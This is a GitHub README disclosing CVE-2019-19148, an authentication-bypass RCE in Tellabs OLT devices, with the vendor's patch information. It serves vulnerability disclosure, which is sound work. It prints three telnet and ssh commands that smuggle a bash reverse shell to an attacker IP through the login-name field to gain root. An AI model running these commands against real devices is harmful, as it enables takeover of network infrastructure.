Skip to content

ellwoodthewood/tellabs_rce

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

tellabs_rce CVE-2019-19148 [updated information from the vendor at the bottom]

Tellabs OLT RCE

During a recent penetration test, a vulnerability in the way Tellabs handles incoming authentication/authorization was discovered which allowed us to bypass the authentication methods on the Tellabs OLT 1150 device. It is highly suspected that this vulnerability exists in other devices as well.

[Product]

Vendor: Tellabs

Model: MX-IPTV1150

System Version: FP29.2_015873

Release: ONT709.2.50.12

Date: 180722

Steps to reproduce were based on the older Telnet "ShellShock" vulnerability.

It's known that the following methods all produced a netcat reverse shell as root: Steps used to exploit:

telnet [OLTHOSTNAME] -l ";EOF() { :;}; /usr/bin/id & /bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1"

The above command asked for the username within the telnet session, and when it timed out, produced the output: "uid=0(emsuser) gid=0(root)" showing that the second portion of the command was not parsed, and the system was vulnerable.

telnet [OLTHOSTNAME] -l "() { :;}; $((/bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1)) /bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1"

The above command was run and produced a reverse 'netcat' style shell to the attacker IP address with a full root bash shell. Again, suspect the second portion of the command was unnecessary, but due to time constraints, was unable to test further.

ssh [OLTHOSTNAME] -l "''; /bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1"

After 3 failed authentication attempts the connect back to the netcat listener occurs and you are dropped in a root shell. (Contributed by Sandia National Laboratory)

Due to customer concerns with the critical nature of the networking infrastructure, further testing beyond the above was not possible, and the customer immediately contacted the vendor to work on a patch.

Recommendations:

Contact the vendor for a patch

Move management interfaces to specific VLAN and ensure only the minimum number of personnel can access that interface

[update]From the vendor:

This Vulnerability applies to the following list of versions of the Tellabs 1150, 1134, and 1131 OLT software:

This Vulnerability is resolved in the following software versions of the Tellabs 1150, 1134, and 1131 OLT software: SR30.1 and SR31.1

Tellabs has addressed this issue in the SR30.1 and SR31.1 release on February 18, 2020. These versions are available on the Tellabs Portal.

About

Tellabs OLT RCE

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages